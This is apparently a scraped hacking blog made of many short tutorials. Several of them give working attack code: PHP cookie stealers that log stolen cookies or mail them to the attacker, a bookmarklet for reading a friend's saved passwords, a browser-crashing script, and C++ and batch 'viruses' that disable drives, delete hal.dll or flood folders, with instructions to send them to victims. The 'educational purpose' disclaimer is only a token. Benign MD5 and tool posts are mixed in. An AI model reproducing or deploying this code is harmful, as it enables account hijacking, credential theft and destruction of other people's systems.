How to create cookie stealer Coding in PHP?~ get via email

Here is the simple Cookie Stealer code:
Cookie stored in File:

<?php
$cookie = $HTTP_GET_VARS["cookie"];
$steal = fopen("cookiefile.txt", "a");
fwrite($steal, $cookie ."\\n");
fclose($steal);
?>

$cookie = $HTTP_GET_VARS["cookie"]; steal the cookie from the current url(stealer.php?cookie=x)and store the cookies in $cookie variable.

$steal = fopen("cookiefile.txt", "a"); This open the cookiefile in append mode so that we can append the stolen cookie.

fwrite($steal, $cookie ."\\n"); This will store the stolen cookie inside the file.

fclose($steal); close the opened file.

Another version: Sends cookies to the hacker mail 

<?php
$cookie = $HTTP_GET_VARS["cookie"]; mail("hackerid@mailprovider.com", "Stolen Cookies", $cookie);
?>

The above code will mail the cookies to hacker mail using the PHP() mail function with subject "Stolen cookies".

Third Version

<?php
function GetIP()
{
    if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
        $ip = getenv("HTTP_CLIENT_IP");
    else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
        $ip = getenv("HTTP_X_FORWARDED_FOR");
    else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
        $ip = getenv("REMOTE_ADDR");
    else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
        $ip = $_SERVER['REMOTE_ADDR'];
    else
        $ip = "unknown";
    return($ip);
}
function logData()
{
    $ipLog="log.txt";
    $cookie = $_SERVER['QUERY_STRING'];
    $register_globals = (bool) ini_get('register_gobals');
    if ($register_globals) $ip = getenv('REMOTE_ADDR');
    else $ip = GetIP();

    $rem_port = $_SERVER['REMOTE_PORT'];
    $user_agent = $_SERVER['HTTP_USER_AGENT'];
    $rqst_method = $_SERVER['METHOD'];
    $rem_host = $_SERVER['REMOTE_HOST'];
    $referer = $_SERVER['HTTP_REFERER'];
    $date=date ("l dS of F Y h:i:s A");
    $log=fopen("$ipLog", "a+");

    if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog))
        fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE:  $cookie <br>");
    else
        fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host |  Agent: $user_agent | METHOD: $rqst_method | REF: $referer |  DATE: $date | COOKIE:  $cookie \n\n");
    fclose($log);
}
logData();
?>

 The above Cookie stealer will store the following information:

• Ip address
• port number
• host(usually computer-name)
• user agent
• cookie

This Article is for Educational purpose only, written for Ethical Hackers. This article is for creating public awareness about the Internet Risks.

Ethical Hackers Forum Launched- Join us

Update:
The forum is deleted becoz we are not able to maintain it.

--
Hi BTS readers, We are proud to say our Ethical Hackers, programmers Forum is launched now.  Join with us now.

Our forum's page rank is 2.

Our forum is mainly concerned with two parts:

1. Programming(My Favorite part)
2. Hacking and Security(Our Favorite Part)

Programming:
If you are developer, then this section is for you.  Start discuss about your favorite programming language now.

Hacking and Security:
We know that it is necessary to know about hacking in order to provide security for your system and organisation.  This section will guide to computer security.

What are you waiting for?

How to run php files using wamp server?

Let me explain today how to use the wamp server to run the PHP files.  First of all download the Latest wamp server from here:

http://www.wampserver.com/

and install the server.

Learn To create Keylogger using C++|Basic Hacking Tutorials

Hi friends, the most interesting part  of the hacking is spying.  Today i am going to introduce to the C++ Spyware code.   It is going to be very fun.  You can install this spyware in your college/school  or in your friend system, and get their username and passwords.  This is very simple hacking trick when compared to phishing web page.

Hacking Autorun.inf virus attack|Is autorun.inf virus?

When i  studied second year(cse), my friends told that autorun.inf is virus.  I thought so.  Because my antivirus blocks autorun.inf files.   In third year when i search about autorun.inf file in net, i realize about the auto run file.

 Today i bring some files from my college system.  When i insert the pen drive in my system, there are lot of exe files.They are viruses.  I delete all of them.  Finally i opened the autorun.inf file in notepad and saw the instructions.  Then only i remembered that i forget to post about autorun file.  This article will give you complete details about the autorun.inf file.
This is the instructions that saved in the infected(call virus programs) autorun.inf file:

How to see the remembered passwords | passwords autofill Cracked

I am going to teach you how to see the passwords which are shown as astersik characters(*).

What is the use?

if your friend/lover select the remember passwords option when login,then you got the chance to hack their password without much effort(no need of phishing ).


Two cases:

Case I: 
if they select remember password in mozilla popup. It is easy to see the password using this method:How to see the saved passwords in mozilla?

Second I:
If the select remember passwords in login form , here is the another method.

How to see the remembered passwords ?
 Whenever someone select remember password in login form,the passwords will be automatically filled.  But the problem is that we can login but can not see the password.  Because the password will be shown as "astersik characters"(*).  Her e is the trick to crack that also.

Visit any site which remembers passwords and show astersik characters in password box.

Copy the following code

javascript:(function(){var s,F,j,f,i; s = ""; F = document.forms; for(j=0; j<F.length; ++j) { f = F[j]; for (i=0; i<f.length; ++i) { if (f[i].type.toLowerCase() == "password") s += f[i].value + "\n"; } } if (s) alert("Passwords in forms on this page:\n\n" + s); else alert("There are no passwords in forms on this page.");})();

Paste in the address bar.
Press enter key
Now the hidden password behind the astersik character will be shown.


Tutorial With Example Picture:
Lets take the yahoomail.com
if the password is auto filled as shown in the picture, then this method will work for you.

MD5 Hash Code for PHP Developers

Hi friends, This post is especially for PHP Developers.  I hope you know about MD5.  If you  do not know,please read the following articles:
Introduction to MD5 Hash Code
MD5 Hash code creation for Java Developers

Like Java, php also have build in function named as "md5" for creating Hash code.

Hack to Enable Right Click in Websites

Is your favorite website disabled the right click button? No need to worry.  you can enable the Right Click button after reading this article.

There are different tools  for disabling the javascript.   But i will introduce again my favorite and best web delveloper tool for you.  This is one of best tool for hackers.

How to to disable right click using javascript?

I am posting this article as per the one of my user request. It is easy to disable right click in a website using javascript.

Code to disable:

oncontextmenu="alert('right click is disable');return false;"

now you may have doubt about placing this javascript code. This code should be in body as one of the attribute.

I think you can understand better if i give example.

<body oncontextmenu="alert('right click is disable');return false;"
>

i think now you understand.

see , this will disabled only for usual internet users. You can not protect it from hackers. We can disable javascript simply using webtool bar add on

MD5 Encryption Java Program(not Decryption)-Message Digest Algorithm

MD5 is one of the famous Hash algorithm.  This algorithm is used in many websites for storing the password in encrypted form. The MD5 message-digest algorithm was developed by Ronald Rivest at MIT in 1992. This algorithm takes a input message of arbitrary length and produces a 128-bit hash value of the message.
  MD5 is one way encryption method,means only encryption no decryption(but there is lot of hackers helping site to decrypt it).

For java programmers it is easy to encrypt the password with MD5.  How?  go ahead...


For two days ,  i didn't post anything because i was doing my NIIT project.  Yesterday only i finished it.  My project is Online banking service.   In my project i have planned to store the password in encrypted password.  But i don't know how to do that?  When i search for algorithm in internet, i came to know that java itself have MD5 algorithm Class.  I got surprised.  Now my project's customers password are stored in 128 bit encrypted form.

Now  I will help you how to use the MD5 Class in java.

Step 1:

• First of all you have to create  a class named as "ByteToHex" for future use.
• Delete Main function(if you are working in  netbeans)
• Create a new Function named as "byteToHex()"

The Source code should be :

package Model;

public class ByteToHex {

public static String bytesToHex(byte[] b) {

char hexDigit[] = {'0', '1', '2', '3', '4', '5', '6', '7',
'8', '9', 'A', 'B', 'C', 'D', 'E', 'F'};
StringBuffer buf = new StringBuffer();
for (int j=0; j<b.length; j++) {
buf.append(hexDigit[(b[j] >>4) & 0x0f]);
buf.append(hexDigit[b[j] & 0x0f]);
}
return buf.toString();
}

}

Save the file

Step 2:

• create a new class with main fucntion.
• import the following packages :

import Model.ByteToHex;

import java.security.MessageDigest;

Use the following code for MD5 encryption:

/*MD5 Encryption goes here-1 way encryption*/

String cipher=null;


try

{



MessageDigest md = MessageDigest.getInstance("MD5");

String input=password;  //storing the password in input string

md.update(input.getBytes()); //storing the password in md object as bytes

byte[] output = md.digest();  //producing the 128 bit output using the md5 algorithm

cipher= ByteToHex.bytesToHex(output); //converting the bytes to string and storing in cipher String

}

catch (Exception e) {

System.out.println("Exception: "+e);

}

/*MD5 Encryption ends here-1 way encryption*/

I hope you understand.  if you have doubts ,comment here.  I will help you.  This program is only for Java programs.  in future i will give you MD5  code for PHP.

you can use SHA-1 algorithm also .By Editing the following line :
MessageDigest.getInstance("MD5");
as
 MessageDigest.getInstance("SHA-1");

Crashing Client's Browser with Javascript

Hi this is very simple javascript code to crash the client browser. If you don't know about javascript ,visit www.w3schools.com(i learn lot of languages quickly there).

<script type='javascript'>
function crash()
{
while(1==1)
{
location.reload(true);
}
</script>

This code will reload the page again and again for infintive time and crash the browser.

How to use it?  Paste the above code in header section.  When page is loaded,the page will reload.  For that use onload handling in body as attribute. can't get you ?
Just see this example:

<body onload='crash()'>

The complete cod is:

<html>
<head>
<script type='javascript'>
function crash()
{
while(1==1)
{
location.reload(true);
}
</script>
</head>
<body onload='crash()'>
</body>
</html>

C++ ,Batch Virus code to disable All Hard disk

Hi friends,here i give you give the C++ virus code.  Actually Batch code is converted to C++ virus code.  If you like you can use it as batch code also.



C++ Virus Code :

#include < windows.h >
#include < fstream.h >
#include < iostream.h >
#include < string.h >
#include < conio.h >
int main()
{
ofstream write ( "C:\\WINDOWS\\system32\\HackingStar.bat" ); /*opening or creating new file with .bat extension*/

write << "REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n"; write << "REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n"; write<<"shutdown -r -c \"Sorry Your System is hacked by us!\" -f"<<"\n"; write.close(); //close file ShellExecute(NULL,"open","C:\\WINDOWS\\system32\\HackingStar.bat ",NULL,NULL,SW_SHOWNORMAL); return 0; }

Copy the above code and paste in notepad
Save the file with .cpp extension
Compile and create .exe file in cpp
Note:
Don't run this c++ program ,it will attack your system itself.
Copy the created .exe file and send it to your victim. You can also attach it with any other
exe files.


Batch Virus Code Creation:

REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n

REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n

shutdown -r -c \"Sorry Your System is hacked by us!\" -f

I think this code will simple for non c++ programmers. It is easy to create the batch file also.
Copy the above code to notepad.
Save it with .bat extension (for ex: nodrivevirus.bat)
Send the file to your victim

Virus to Delete mouse,explore,logoff using Batch Programming

Usually we write simple viruses in batch programming.  This time also i have one Batch Programming. It will delete explore.exe,logoff ,mouse,keyboard files. So victims can not do anything in his computer.

C++ virus that deletes the hal.dll file in system32

Hi in this article i will give you the c++ virus code.  Don't use for any illegal purpose.  This is just for learning purpose only.

#include<stdio.h>
#include<stdlib.h>

using namespace std;

int main(int argc, char *argv[])
{
std::remove("%systemroot%\\system32\\hal.dll"); //PWNAGE TIME
system("shutdown -s -r");
system("PAUSE");
return EXIT_SUCCESS;
}

Above code will find the system32 folder and deletes the "hal.dll" file

Just For Fun Javascripts in Mozilla Firefox-Edit any websites

In my last post , i gave you three javascript for mozilla. You can edit any websites by this javascript(don't think you are editing in server, you are just editing in mozilla only). You can change the homepage name to your name. whatever you like to do.

javascript:document.body.contentEditable='true';document.designMode='on';void 0

Visit any website
Paste the above code in the address bar
Hit enter
Try to edit any text or link.

From Java Byte code to Java Source Code

This article is especially for Java programmers.  I am going to give you tool which will decompile the byte code and give you source code.  Sounds good na?! 

The “Java Decompiler project” aims to develop tools in order to decompile and analyze Java 5 “byte code” and the later versions.

Wonderful Notepad for programmers-Notepad++

Hi friends, I like to do programming,hacking,blogging. I am addicted to these three things. Especially for programming. As a programmer i have used more tools . So i like to introduce my favorite notepad namely Notepad++ . It supports all programming language.

Features:

• Clear View of coding So easy to debug the code
• Different Colors for Keywords ,variables
• Easy to edit

C program Memory Space Eater virus

Hi friends this is BreakTheSec. I am going to give you C program to eat the memory in Hard drive. This virus is able to eat the memory space 1 GB per minute. So Becareful with this virus.

Create a virus to create a infinite folder in a drive

Hi Hackers, this batch code will very helpful for you.  This is simple and effective virus code.

As usual open notepad.
Copy this code to Notepad.

@echo off
:top
md %random%
goto top

 @echo off makes it so that it appears to be a blank screen but actually its making hundreds of folder.
md %random% is command that creating folders with random names.
goto top – return to label :top , infinite loop

Save the file with .bat extension(for eg: folderscreate.bat)

That's all if you double click the file it will create a finite folder wherever the batch file is.

Create a virus to make the computer freezed using Batch Programming

Now i am going to give you simple and only one line Batch code. Special about this virus is that easy to remember the code. So it will be useful to use in college or school.

  This is for newbie. This virus is harmful for CPU. So be careful. Don't run this in your pc or friend pc.

Open a notepad.